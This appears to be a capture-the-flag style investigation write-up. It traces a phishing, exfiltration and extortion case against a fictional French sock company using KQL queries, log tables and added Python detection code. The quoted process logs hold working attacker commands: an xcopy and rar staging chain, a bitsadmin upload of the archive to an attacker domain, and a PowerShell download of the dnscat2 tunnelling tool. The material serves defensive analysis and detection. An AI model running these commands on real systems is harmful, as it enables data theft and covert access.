French Socksess Story

As is often the case, players take on the role of a rookie security analyst tasked with investigating a cyber attack against a company, this time a French fashion company specializing in socks, named Jus de Chaussette. While previous cases implied or outright stated you were an employee of those companies, this might be the first time you take on the role of an analyst interning at a specialized (unnamed) cybersecurity firm. I thought that was neat.

Sections

Section 1 - Sock Savior

There was a meeting with the Jus de Chaussette staff regarding an alleged data breach they've suffered. According to an executive, they were sent an email--projected during the meeting--by a threat actor calling itself "The Sock Puppet Empire", which might be a pun on both Jus de Chaussette's leading product and online sock puppet accounts; they threaten to leak controversial information (allegedly dishonest practices involving outsourced labor) found while snooping the company's intranet and emails, and demand 2M EUR within the next 24 hours in exchange for their silence in the matter. The email's information is truncated except for its subject line and body, replicated below:

Pay up or the world will know your lies
Bonjour,
You, my dears, have been naughty. Lying is not a good look, non, non 😔

What would your lovely customers think of that? Such cruel betrayal. Maybe we ought to warn them 🤔? Show them the proof we found while snooping around your systems 🕵🏻?

Cover, you could buy our silence 🤫 For the very modest sum of 2,000,000€, your misbehaving will be our little secret, pinky swear.
If we haven't heard from you in the next 24 hours, we'll introduce your Indian friends to your customers. We bet your shareholders will be delighted 💸.
Tic tac, tic tac.

Yours truly,

The Sock Puppet Empire

Knowing the subject line is a good starting point for the investigation.

Email
| where subject =~ 'Pay up or the world will know your lies'
Query Results
timestamp sender reply_to recipient subject verdict link
2024-08-30 23:44:13.0000 theempireownsyou@proton.me theempireownsyou@proton.me brooke_entoe@jusdechaussette.fr Pay up or the world will know your lies CLEAN
2024-08-30 23:44:13.0000 theempireownsyou@proton.me theempireownsyou@proton.me cho_cetkipu@jusdechaussette.fr Pay up or the world will know your lies CLEAN
2024-08-30 23:44:13.0000 theempireownsyou@proton.me theempireownsyou@proton.me cho_cetkipu@jusdechaussette.fr Pay up or the world will know your lies CLEAN

Three emails, all sent at exactly the same time (twice to the same recipient). There are no outbound links or attachments according to the logs. The sender is theempireownsyou@proton.me and--following a quick lookup on the Employees table--the recipients are Cho Cetkipu (Chief Executive Officer) and Brooke Entoe (Chief Financial Officer). There are no other emails from this sender.

Since the threat actor outright admits to having stolen information--sensitive information regarding internal operations, particularly implying that the French-made socks aren't truly French--it wouldn't hurt to check for suspicious processes on the CFO's and CEO's corporate devices.

Email
| where subject =~ 'Pay up or the world will know your lies'
| distinct recipient
| lookup Employees on $left.recipient == $right.email_addr
| distinct hostname
| lookup ProcessEvents on $left.hostname == $right.hostname
| where timestamp between (datetime(2024-08-30) .. datetime(2024-08-31))
and process_commandline !contains "WindowsApps" //get rid of the chaff
and process_commandline !contains "SystemApps" //get rid of the chaff
and process_commandline !contains "Edge" //get rid of the chaff
and process_commandline !contains "Teams" //get rid of the chaff
| sort by hostname, timestamp asc
Query Results
This table has been redacted; it only shows the most relevant findings, rather than the entire output of the KQL query above.
hostname timestamp parent_process_name parent_process_hash process_commandline process_name process_hash username
SCHR-MACHINE 2024-08-30 18:50:32.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f net use Z: \\Server\Contracts\Hidden cmd.exe 636f48ad6d49c4430b1b62d75440af1fa4be8a80ca671a0e09df80d2ff8169b9 chcetkipu
SCHR-MACHINE 2024-08-30 19:12:50.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f xcopy /h /s /q Z: \\Server\Contracts\Hidden\* C:\Users\chcetkipu\Downloads\notfrench cmd.exe fe993e389b5a40faaa7d95cc49b94f561c45cc87708ad7b7fa236392c70563d8 chcetkipu
SCHR-MACHINE 2024-08-30 20:02:54.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f rar a -df -hp sn3@ky C:\Users\chcetkipu\Downloads\lies.rar C:\Users\chcetkipu\Downloads\notfrench cmd.exe e5240df94a26cf644dfa76fe2375bdeaf5fdab6c86264ac432ddae764de19de3 chcetkipu
SCHR-MACHINE 2024-08-30 20:51:45.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f bitsadmin /create stomping cmd.exe 8203b26256dc4b08ace6efce038be956abe493f3d8ebae164ab3ca8c6d77f76b chcetkipu
SCHR-MACHINE 2024-08-30 21:05:58.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f bitsadmin /transfer stomping /upload https://liarliarsocksonfire.net/wegotthegoods/lies.rar C:\Users\chcetkipu\downloads\lies.rar cmd.exe 5aa062c56adfe2c74e934dcd2eb008b75145279f2520223fd45b904052d403b0 chcetkipu
SCHR-MACHINE 2024-08-30 21:37:32.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f bitsadmin /complete stomping cmd.exe fe8f699de349c1c6a69e52f771fb1c80bc9741d9c2bafea70e680dab45815c42 chcetkipu
9RGD-MACHINE 2024-08-30 18:50:58.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f net use Z: \\Server\Contracts\Hidden cmd.exe ec9f8551c3fe2f1a8f5c244fd81a4ae877ed25c9fcc0cf5bb299241c9763e1e0 brentoe
9RGD-MACHINE 2024-08-30 19:11:44.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f xcopy /h /s /q Z: \\Server\Contracts\Hidden\* C:\Users\brentoe\Downloads\notfrench cmd.exe 9956513bc59d6e3694635cc2699dcc99d181744e90e9bd782f01a516a4cb3884 brentoe
9RGD-MACHINE 2024-08-30 19:44:10.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f rar a -df -hp sn3@ky C:\Users\brentoe\Downloads\lies.rar C:\Users\brentoe\Downloads\notfrench cmd.exe a0f4306ed63947c325a587c829502949b4c99deacbda7b059d8195bf85194861 brentoe
9RGD-MACHINE 2024-08-30 20:06:18.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f bitsadmin /create stomping cmd.exe e5218e2c06b998d67eda8bc6f76f547b0687b0eaf086ac24092472917931f915 brentoe
9RGD-MACHINE 2024-08-30 20:48:48.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f bitsadmin /transfer stomping /upload https://liarliarsocksonfire.net/wegotthegoods/lies.rar C:\Users\brentoe\downloads\lies.rar cmd.exe 127958042e9c97b4367984d99fcfb9123d8ef4e4aab1b51e0b05f285967af406 brentoe
9RGD-MACHINE 2024-08-30 21:06:56.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f bitsadmin /complete stomping cmd.exe 87a4a7883492915222e27633fca70ddcffbc039636e60c1272d711a84b5b59a5 brentoe

The first command they run is net use Z: \\Server\Contracts\Hidden in order to connect to the intranet's hidden contracts directory, assigning it the drive letter Z: [Microsoft Learn]. Then, they use xcopy to recursively copy all the contents of said directory to the notfrench directory, located in the target's Downloads directory; the flags used are:

  • /h: Copies files with hidden and system file attributes. By default, xcopy doesn't copy hidden or system files.
  • /s: Copies directories and subdirectories, unless they're empty. If you omit /s, xcopy works within a single directory.
  • /q: Suppresses the display of xcopy messages.

[Microsoft Learn]. This is followed by the rar command with a specific set of switches: rar a -df -hp sn3@ky, meaning, in order:

  • a: a command, per WinRAR's docs, to add files to an archive.
  • -df: a switch, per WinRAR's docs, to delete files after archiving.
  • -hp: a switch, per WinRAR's docs, to encrypt both file data and headers. The password is sn3@ky.

The resulting archive is lies.rar. Now, with their desired information packaged and ready to go, they use a command I hadn't seen used before: bitsadmin, which refers to Windows' built-in Background Intelligent Transfer Service (BITS). It can create, upload, download and monitor jobs [Microsoft Learn]. In order:

  1. bitsadmin /create stomping: create a job called stomping
  2. bitsadmin /transfer stomping /upload https://liarliarsocksonfire.net/wegotthegoods/lies.rar C:\Users\brentoe\downloads\lies.rar: Transfer one or more files [Microsoft Learn]. The type of transfer is an upload, i.e., the data is exfiltrated to the threat actor's server.
  3. bitsadmin /complete stomping: set the job as complete, making all files available. [Microsoft Learn]

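As an added worked example (not part of the original writeup), the following Python pulls the exfiltration artefacts out of process command lines like the ones above: it parses the rar switches (recovering the -hp password, which lets responders open a recovered copy of the archive to scope exactly what left the network) and pairs each archive with the later bitsadmin /upload of the same file on the same host. The event rows are constructed from the CEO's rows in the table above; the IT-LAPTOP host is an invented benign control.

```python
import re
from urllib.parse import urlparse

# Constructed sample in the shape of the ProcessEvents rows above (CEO's host),
# plus one benign BITS download on another host to show what is NOT flagged.
EVENTS = [
    {"hostname": "SCHR-MACHINE", "username": "chcetkipu", "timestamp": "2024-08-30 18:50:32",
     "process_commandline": r"net use Z: \\Server\Contracts\Hidden"},
    {"hostname": "SCHR-MACHINE", "username": "chcetkipu", "timestamp": "2024-08-30 19:12:50",
     "process_commandline": r"xcopy /h /s /q Z: \\Server\Contracts\Hidden\* C:\Users\chcetkipu\Downloads\notfrench"},
    {"hostname": "SCHR-MACHINE", "username": "chcetkipu", "timestamp": "2024-08-30 20:02:54",
     "process_commandline": r"rar a -df -hp sn3@ky C:\Users\chcetkipu\Downloads\lies.rar C:\Users\chcetkipu\Downloads\notfrench"},
    {"hostname": "SCHR-MACHINE", "username": "chcetkipu", "timestamp": "2024-08-30 20:51:45",
     "process_commandline": "bitsadmin /create stomping"},
    {"hostname": "SCHR-MACHINE", "username": "chcetkipu", "timestamp": "2024-08-30 21:05:58",
     "process_commandline": r"bitsadmin /transfer stomping /upload https://liarliarsocksonfire.net/wegotthegoods/lies.rar C:\Users\chcetkipu\downloads\lies.rar"},
    {"hostname": "SCHR-MACHINE", "username": "chcetkipu", "timestamp": "2024-08-30 21:37:32",
     "process_commandline": "bitsadmin /complete stomping"},
    # Invented benign control: a routine BITS download, not an upload.
    {"hostname": "IT-LAPTOP", "username": "admin1", "timestamp": "2024-08-30 10:00:00",
     "process_commandline": r"bitsadmin /transfer patching /download https://example.invalid/patch.msi C:\Temp\patch.msi"},
]


def parse_rar(cmd):
    """Parse `rar a [switches] <archive> <sources...>`; returns None if cmd is not one."""
    toks = cmd.split()
    if len(toks) < 3 or toks[0].lower() != "rar" or toks[1].lower() != "a":
        return None
    info = {"delete_source": False, "encrypt_headers": False, "password": None}
    i = 2
    while i < len(toks) and toks[i].startswith("-"):
        sw, low = toks[i], toks[i].lower()
        if low == "-df":
            info["delete_source"] = True
        elif low.startswith("-hp") or low.startswith("-p"):
            info["encrypt_headers"] = low.startswith("-hp")
            pw = sw[3:] if low.startswith("-hp") else sw[2:]
            # WinRAR attaches the password to the switch (-hpSECRET); the logs on this
            # page show it as a separate token, so accept that form as well.
            if not pw and i + 1 < len(toks) and not toks[i + 1].startswith("-") \
                    and not toks[i + 1].lower().endswith(".rar"):
                i += 1
                pw = toks[i]
            info["password"] = pw or None
        i += 1
    if i >= len(toks):
        return None
    info["archive"], info["sources"] = toks[i], toks[i + 1:]
    return info


def parse_bits_upload(cmd):
    """Parse `bitsadmin /transfer <job> /upload <remote> <local>`; None for anything else."""
    toks = cmd.split()
    if len(toks) < 5 or toks[0].lower() != "bitsadmin" or toks[1].lower() != "/transfer":
        return None
    if not any(t.lower() in ("/upload", "/upload-reply") for t in toks[3:]):
        return None  # /download jobs are routine (patching etc.)
    remote, local = toks[-2], toks[-1]
    return {"job": toks[2], "remote_url": remote,
            "remote_host": urlparse(remote).hostname, "local_path": local}


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_exfil_chains(events):
    """Per host/user: pair each rar archive with a later BITS upload of the same file."""
    chains, state = [], {}
    for ev in sorted(events, key=lambda e: e["timestamp"]):
        key = (ev["hostname"], ev["username"])
        st = state.setdefault(key, {"share": None, "archives": {}})
        cmd = ev["process_commandline"]
        if cmd.lower().startswith("net use "):
            st["share"] = cmd.split()[-1]  # staging source, e.g. \\Server\Contracts\Hidden
        elif (rar := parse_rar(cmd)):
            rar["archived_at"] = ev["timestamp"]
            st["archives"][_basename(rar["archive"])] = rar
        elif (bits := parse_bits_upload(cmd)):
            rar = st["archives"].get(_basename(bits["local_path"]))
            if rar is None:
                continue  # an upload of something we never saw archived
            chains.append({
                "hostname": ev["hostname"], "username": ev["username"],
                "staged_from": st["share"], "archive": rar["archive"],
                "password": rar["password"], "encrypted_headers": rar["encrypt_headers"],
                "sources_deleted": rar["delete_source"],
                "upload_host": bits["remote_host"], "upload_url": bits["remote_url"],
                "archived_at": rar["archived_at"], "uploaded_at": ev["timestamp"],
            })
    return chains


if __name__ == "__main__":
    for c in find_exfil_chains(EVENTS):
        print(f"{c['hostname']}/{c['username']}: {c['archive']} (pw {c['password']}) -> {c['upload_host']}")
```

Because -df deletes the staged copies, the process log is often the only place the archive password survives, which is why it is worth extracting rather than just flagging the command.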
To reveal more of the threat actor's infrastructure, I do a series of recursive lookups against the PassiveDns table:

PassiveDns
| where domain == "liarliarsocksonfire.net"
| distinct ip
| lookup PassiveDns on $left.ip == $right.ip
| distinct domain
Query Results
domain
thesockwhisperer.com
liarliarsocksonfire.net

The threat actor has two distinct domains; further recursive lookups do not reveal any others. These domains, in turn, lead to these IP addresses:

PassiveDns
| where domain == "liarliarsocksonfire.net"
| distinct ip
| lookup PassiveDns on $left.ip == $right.ip
| distinct domain
| lookup PassiveDns on $left.domain == $right.domain
| distinct ip
Query Results
ip
45.134.232.69
193.233.125.78
8.95.2.97

The threat actor has three distinct IP addresses; further recursive lookups do not reveal any others.
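The recursive lookups above can be run to a fixed point rather than chained by hand. This added Python (not from the writeup) implements that pivot over a constructed PassiveDns sample reproducing the records found here, and adds the guard a practitioner would want: an IP that resolves to many domains is treated as shared hosting and not pivoted through, otherwise a single CDN address would drag unrelated domains into the actor's "infrastructure".

```python
from collections import defaultdict

# Constructed PassiveDns sample reproducing the two domains and three IPs found
# above, plus an unrelated record to show the pivot does not leak into it.
PASSIVE_DNS = [
    ("liarliarsocksonfire.net", "45.134.232.69"),
    ("liarliarsocksonfire.net", "193.233.125.78"),
    ("thesockwhisperer.com", "193.233.125.78"),
    ("thesockwhisperer.com", "8.95.2.97"),
    ("jusdechaussette.fr", "203.0.113.10"),  # constructed, unrelated
]


def pivot_infrastructure(records, seed_domain, max_domains_per_ip=10):
    """Transitive closure of domain -> ip -> domain -> ... starting from seed_domain.

    Mirrors the writeup's alternating `distinct ip` / `lookup PassiveDns` steps,
    but repeats them until nothing new appears. IPs that resolve to more than
    max_domains_per_ip domains are treated as shared hosting / CDN: they are
    reported but not pivoted through.
    """
    by_domain, by_ip = defaultdict(set), defaultdict(set)
    for domain, ip in records:
        by_domain[domain.lower()].add(ip)
        by_ip[ip].add(domain.lower())

    domains, ips, shared = {seed_domain.lower()}, set(), set()
    rounds = 0
    while True:
        rounds += 1
        # domain -> ip (the writeup's "distinct ip" step)
        new_ips = {ip for d in domains for ip in by_domain[d]} - ips
        ips |= new_ips
        # ip -> domain (the "lookup PassiveDns on $left.ip == $right.ip" step)
        new_domains = set()
        for ip in ips:
            if len(by_ip[ip]) > max_domains_per_ip:
                shared.add(ip)
                continue
            new_domains |= by_ip[ip]
        new_domains -= domains
        domains |= new_domains
        if not new_ips and not new_domains:
            break  # the round that finds nothing is the "no others" confirmation
    return {"domains": domains, "ips": ips, "rounds": rounds, "shared_hosting_ips": shared}


def to_kql_list(values):
    """Render a set as a KQL list literal, e.g. for `where src_ip in (...)`."""
    return "(" + ", ".join(f'"{v}"' for v in sorted(values)) + ")"


if __name__ == "__main__":
    result = pivot_infrastructure(PASSIVE_DNS, "liarliarsocksonfire.net")
    print(f"{result['rounds']} rounds -> domains {to_kql_list(result['domains'])}")
    print(f"ips {to_kql_list(result['ips'])}")
```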

Before checking if anyone else has strange processes on their devices, I wanted to take a look at any possible connections made by these IP addresses (or to these domains). I'll start by checking for any emails containing links to these domains:

let bad_domains =
PassiveDns
| where domain == "liarliarsocksonfire.net"
| distinct ip
| lookup PassiveDns on $left.ip == $right.ip
| distinct domain;
let bad_ips =
PassiveDns
| where domain == "liarliarsocksonfire.net"
| distinct ip
| lookup PassiveDns on $left.ip == $right.ip
| distinct domain
| lookup PassiveDns on $left.domain == $right.domain
| distinct ip;
Email
| where tostring(parse_url(link).Host) in (bad_domains)
Query Results
timestamp sender reply_to recipient subject verdict link
2024-08-19 14:37:05.0000 mike_oz@jusdechaussette.fr mike_oz@jusdechaussette.fr cho_cetkipu@jusdechaussette.fr Le President loves our latest design! Opportunity for presidential socks??? $$$$ CLEAN http://thesockwhisperer.com/images/modules/public/decision.docx
2024-08-19 14:37:05.0000 mike_oz@jusdechaussette.fr mike_oz@jusdechaussette.fr cho_cetkipu@jusdechaussette.fr Le President loves our latest design! Opportunity for presidential socks??? $$$$ CLEAN http://thesockwhisperer.com/images/modules/public/decision.docx
2024-08-19 14:37:05.0000 mike_oz@jusdechaussette.fr mike_oz@jusdechaussette.fr brooke_entoe@jusdechaussette.fr Le President loves our latest design! Opportunity for presidential socks??? $$$$ CLEAN http://thesockwhisperer.com/images/modules/public/decision.docx

Quite worrisome; Customer Service Pinky Toe Mike Oz--as confirmed with a lookup on the Employees table--sent phishing emails with download links to malicious documents; the domain is related to the threat actor (see [3] above). While there is always the possibility of an insider threat, it's just as likely (if not more so) that Mike Oz had his corporate account compromised. The affected users were CFO Brooke Entoe and CEO Cho Cetkipu.

Before examining Mike Oz further, I'll continue with the OutboundNetworkEvents table.

let bad_domains =
PassiveDns
| where domain == "liarliarsocksonfire.net"
| distinct ip
| lookup PassiveDns on $left.ip == $right.ip
| distinct domain;
let bad_ips =
PassiveDns
| where domain == "liarliarsocksonfire.net"
| distinct ip
| lookup PassiveDns on $left.ip == $right.ip
| distinct domain
| lookup PassiveDns on $left.domain == $right.domain
| distinct ip;
OutboundNetworkEvents
| where tostring(parse_url(url).Host) in (bad_domains)
| lookup Employees on $left.src_ip == $right.ip_addr
| distinct timestamp, method, src_ip, role, name, user_agent, url
Query Results
timestamp method src_ip role name user_agent url
2024-08-19 14:51:05.0000 GET 10.10.0.32 CFO Brooke Entoe Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36 http://thesockwhisperer.com/images/modules/public/decision.docx
2024-08-19 15:09:05.0000 GET 10.10.0.2 CEO Cho Cetkipu Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; Trident/5.0) http://thesockwhisperer.com/images/modules/public/decision.docx
2024-08-19 15:10:05.0000 GET 10.10.0.2 CEO Cho Cetkipu Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; Trident/5.0) http://thesockwhisperer.com/images/modules/public/decision.docx

This unfortunately confirms that the CEO and CFO both clicked the link, and very likely downloaded the file and opened it. Before examining this further, I'd like to check on Mike Oz's device or emails for signs of threat actor activity; but before that, I want to check the InboundNetworkEvents table for any hints of recon the threat actors might've engaged in before this attack.

let bad_domains =
PassiveDns
| where domain == "liarliarsocksonfire.net"
| distinct ip
| lookup PassiveDns on $left.ip == $right.ip
| distinct domain;
let bad_ips =
PassiveDns
| where domain == "liarliarsocksonfire.net"
| distinct ip
| lookup PassiveDns on $left.ip == $right.ip
| distinct domain
| lookup PassiveDns on $left.domain == $right.domain
| distinct ip;
InboundNetworkEvents
| where src_ip in (bad_ips)
Query Results
timestamp method src_ip user_agent url referrer status_code
2024-08-18 00:00:00.0000 GET 45.134.232.69 Mozilla/5.0 (Macintosh; PPC Mac OS X 10_9_5 rv:3.0; el-CY) AppleWebKit/534.42.3 (KHTML, like Gecko) Version/4.1 Safari/534.42.3 https://jusdechaussette.fr/search%3Ddoes%2Bthe%2BCEO%2Bwear%2Bhis%2Bown%2Bbrand%2Bof%2Bsocks https:jusdechaussette.fr/search 200
2024-08-18 13:52:06.0000 GET 45.134.232.69 Mozilla/5.0 (Macintosh; PPC Mac OS X 10_9_5 rv:3.0; el-CY) AppleWebKit/534.42.3 (KHTML, like Gecko) Version/4.1 Safari/534.42.3 https://jusdechaussette.fr/search%3Dwho%2Bis%2Bthe%2Bgenius%2Bbehind%2Bthe%2Blatest%2Bdesign https:jusdechaussette.fr/search 200
2024-08-18 13:52:27.0000 GET 45.134.232.69 Mozilla/5.0 (Macintosh; PPC Mac OS X 10_9_5 rv:3.0; el-CY) AppleWebKit/534.42.3 (KHTML, like Gecko) Version/4.1 Safari/534.42.3 https://jusdechaussette.fr/search%3Dhow%2Bto%2Bmake%2Ba%2Bcomplaint https:jusdechaussette.fr/search 200
2024-08-18 13:52:53.0000 GET 45.134.232.69 Mozilla/5.0 (Macintosh; PPC Mac OS X 10_9_5 rv:3.0; el-CY) AppleWebKit/534.42.3 (KHTML, like Gecko) Version/4.1 Safari/534.42.3 https://jusdechaussette.fr/search%3Dhow%2Bto%2Bcontact%2Bcustomer%2Bservice https:jusdechaussette.fr/search 200
2024-08-18 13:53:46.0000 GET 45.134.232.69 Mozilla/5.0 (Macintosh; PPC Mac OS X 10_9_5 rv:3.0; el-CY) AppleWebKit/534.42.3 (KHTML, like Gecko) Version/4.1 Safari/534.42.3 https://jusdechaussette.fr/search%3Dare%2Bthe%2Bsocks%2Breally%2Bthat%2Bcomfy https:jusdechaussette.fr/search 200
2024-08-18 13:54:07.0000 GET 8.95.2.97 Mozilla/5.0 (Macintosh; PPC Mac OS X 10_9_5 rv:3.0; el-CY) AppleWebKit/534.42.3 (KHTML, like Gecko) Version/4.1 Safari/534.42.3 https://jusdechaussette.fr/gallery/fashion-show/you-wont-believe-who-cried-wearing-our-brand-new-socks https://www.linkedin.com 200
2024-08-18 13:55:04.0000 GET 193.233.125.78 Mozilla/5.0 (Macintosh; PPC Mac OS X 10_9_5 rv:3.0; el-CY) AppleWebKit/534.42.3 (KHTML, like Gecko) Version/4.1 Safari/534.42.3 https://jusdechaussette.fr/blog/influencer-interviews/the-French-president-loves-us https://www.linkedin.com 200
2024-08-18 13:55:44.0000 GET 8.95.2.97 Mozilla/5.0 (Macintosh; PPC Mac OS X 10_9_5 rv:3.0; el-CY) AppleWebKit/534.42.3 (KHTML, like Gecko) Version/4.1 Safari/534.42.3 https://jusdechaussette.fr/about/our-awesome-team/mascot https://www.linkedin.com 200
2024-08-18 13:56:09.0000 GET 193.233.125.78 Mozilla/5.0 (Macintosh; PPC Mac OS X 10_9_5 rv:3.0; el-CY) AppleWebKit/534.42.3 (KHTML, like Gecko) Version/4.1 Safari/534.42.3 https://jusdechaussette.fr/about/our-awesome-team/customer-service-our-unsung-heroes https://www.linkedin.com 200
2024-08-18 13:56:25.0000 GET 193.233.125.78 Mozilla/5.0 (Macintosh; PPC Mac OS X 10_9_5 rv:3.0; el-CY) AppleWebKit/534.42.3 (KHTML, like Gecko) Version/4.1 Safari/534.42.3 https://jusdechaussette.fr/career/why-we-are-so-great-to-work-at https://www.welcometothejungle.com 200
2024-08-18 13:56:49.0000 GET 8.95.2.97 Mozilla/5.0 (Macintosh; PPC Mac OS X 10_9_5 rv:3.0; el-CY) AppleWebKit/534.42.3 (KHTML, like Gecko) Version/4.1 Safari/534.42.3 https://jusdechaussette.fr/career/join-us/baby-steps https://www.welcometothejungle.com 200
2024-08-18 13:57:23.0000 GET 45.134.232.69 Mozilla/5.0 (Macintosh; PPC Mac OS X 10_9_5 rv:3.0; el-CY) AppleWebKit/534.42.3 (KHTML, like Gecko) Version/4.1 Safari/534.42.3 https://jusdechaussette.fr/career/join-us/opportunities https://www.welcometothejungle.com 200
2024-08-18 13:57:56.0000 GET 45.134.232.69 Mozilla/5.0 (Macintosh; PPC Mac OS X 10_9_5 rv:3.0; el-CY) AppleWebKit/534.42.3 (KHTML, like Gecko) Version/4.1 Safari/534.42.3 https://jusdechaussette.fr/career/join-us/customer-service-role https://www.welcometothejungle.com 200
2024-08-18 13:58:40.0000 GET 45.134.232.69 Mozilla/5.0 (Macintosh; PPC Mac OS X 10_9_5 rv:3.0; el-CY) AppleWebKit/534.42.3 (KHTML, like Gecko) Version/4.1 Safari/534.42.3 https://jusdechaussette.fr/search%3Dcustomer%2Bdatabase https:jusdechaussette.fr/search 200
2024-08-18 13:59:15.0000 GET 45.134.232.69 Mozilla/5.0 (Macintosh; PPC Mac OS X 10_9_5 rv:3.0; el-CY) AppleWebKit/534.42.3 (KHTML, like Gecko) Version/4.1 Safari/534.42.3 https://jusdechaussette.fr/search%3Dcustomer%2BPII https:jusdechaussette.fr/search 200
2024-08-18 13:59:32.0000 GET 45.134.232.69 Mozilla/5.0 (Macintosh; PPC Mac OS X 10_9_5 rv:3.0; el-CY) AppleWebKit/534.42.3 (KHTML, like Gecko) Version/4.1 Safari/534.42.3 https://jusdechaussette.fr/search%3Dmailing%2Blist https:jusdechaussette.fr/search 200
2024-08-18 14:00:14.0000 GET 45.134.232.69 Mozilla/5.0 (Macintosh; PPC Mac OS X 10_9_5 rv:3.0; el-CY) AppleWebKit/534.42.3 (KHTML, like Gecko) Version/4.1 Safari/534.42.3 https://jusdechaussette.fr/search%3Dwhy%2Bare%2Bpeople%2Bposting%2Btheir%2Bfeet%2Bon%2Bthis%2Bwebsite%2Bomg https:jusdechaussette.fr/search 200
2024-08-18 14:00:51.0000 GET 193.233.125.78 Mozilla/5.0 (Macintosh; PPC Mac OS X 10_9_5 rv:3.0; el-CY) AppleWebKit/534.42.3 (KHTML, like Gecko) Version/4.1 Safari/534.42.3 https://jusdechaussette.fr/contact/customer-service/contact-form https://duckduckgo.com 200
2024-08-18 14:01:33.0000 GET 45.134.232.69 Mozilla/5.0 (Macintosh; PPC Mac OS X 10_9_5 rv:3.0; el-CY) AppleWebKit/534.42.3 (KHTML, like Gecko) Version/4.1 Safari/534.42.3 https://jusdechaussette.fr/contact/customer-service/contact-form/upload https://instructure.com 200
2024-08-18 14:02:13.0000 GET 193.233.125.78 Mozilla/5.0 (Macintosh; PPC Mac OS X 10_9_5 rv:3.0; el-CY) AppleWebKit/534.42.3 (KHTML, like Gecko) Version/4.1 Safari/534.42.3 https://jusdechaussette.fr/contact/customer-service/contact-form/upload%3Dholesinmysocks.jpeg https://office.com 200
2024-08-18 14:02:52.0000 GET 193.233.125.78 Mozilla/5.0 (Macintosh; PPC Mac OS X 10_9_5 rv:3.0; el-CY) AppleWebKit/534.42.3 (KHTML, like Gecko) Version/4.1 Safari/534.42.3 https://jusdechaussette.fr/contact/customer-service/contact-form/upload%3Dholesinmysocks.jpeg%26status%3Dsuccess https://ebay.com 200
2024-08-18 14:03:29.0000 GET 45.134.232.69 Mozilla/5.0 (Macintosh; PPC Mac OS X 10_9_5 rv:3.0; el-CY) AppleWebKit/534.42.3 (KHTML, like Gecko) Version/4.1 Safari/534.42.3 https://jusdechaussette.fr/search%3Dshady%2Bdeals https:jusdechaussette.fr/search 200
2024-08-18 14:40:29.0000 GET 45.134.232.69 Mozilla/5.0 (Macintosh; PPC Mac OS X 10_9_5 rv:3.0; el-CY) AppleWebKit/534.42.3 (KHTML, like Gecko) Version/4.1 Safari/534.42.3 https://jusdechaussette.fr/search%3Dcotton%2Borigin https:jusdechaussette.fr/search 200
2024-08-18 14:41:29.0000 GET 45.134.232.69 Mozilla/5.0 (Macintosh; PPC Mac OS X 10_9_5 rv:3.0; el-CY) AppleWebKit/534.42.3 (KHTML, like Gecko) Version/4.1 Safari/534.42.3 https://jusdechaussette.fr/search%3Dthe%2Bsock%2Bis%2Ba%2Blie https:jusdechaussette.fr/search 200
2024-08-18 15:26:29.0000 GET 45.134.232.69 Mozilla/5.0 (Macintosh; PPC Mac OS X 10_9_5 rv:3.0; el-CY) AppleWebKit/534.42.3 (KHTML, like Gecko) Version/4.1 Safari/534.42.3 https://jusdechaussette.fr/search%3DCho%2BCetkipu%2Bis%2Ba%2Bfraud https:jusdechaussette.fr/search 200

The queries are for a variety of things, including casting doubt on the quality of Jus de Chaussette's product, checking articles on the French President's endorsement of the brand, how to file a complaint, how to contact customer service (which would include Mike Oz), trying to find the customer database or any customer PII on the Jus de Chaussette servers, and any mailing lists the company may have. They eventually find a link to a Contact Form, through which they upload a file named holesinmysocks.jpeg at 14:02:52 on 2024-08-18--the day before "Mike Oz" sent the first email to the CFO. Even after that, there are queries questioning the sourcing of the cotton used for manufacturing the socks.

With such a clear hint of what happened, I checked what happened on Mike Oz's device from the time the holesinmysocks.jpeg file was uploaded through the contact form onwards; since his account was compromised, it's likely that this file dropped something on his computer.

ProcessEvents
| where username == "mioz"
| where timestamp >= datetime(2024-08-18 14:02:52.0000)
| where process_commandline !contains "Edge"
and process_commandline !contains "Teams"
and process_commandline !contains "WindowsApps"
and process_commandline !contains "SystemApps"
Query Results
This table has been redacted; it only shows the most relevant findings, rather than the entire output of the KQL query above.
timestamp parent_process_name parent_process_hash process_commandline process_name process_hash hostname username
2024-08-18 16:10:29.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f holesinmysocks.jpeg explorer.exe 042d1eb353c966938bf93fdf56a37a088a918bee219e8384092c09b4dacab0d9 7SSS-DESKTOP mioz
2024-08-18 16:58:29.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f Invoke-WebRequest -Uri https://downloads.skullsecurity.org/dnscat2.zip -OutFile C:\Users\mioz\downloads\dnscat2.zip powershell.exe eac2546a14f9284b0ffbb4f4c0e6fd00cd9fc1f15e3b6194cdb10ab76a886fb7 7SSS-DESKTOP mioz
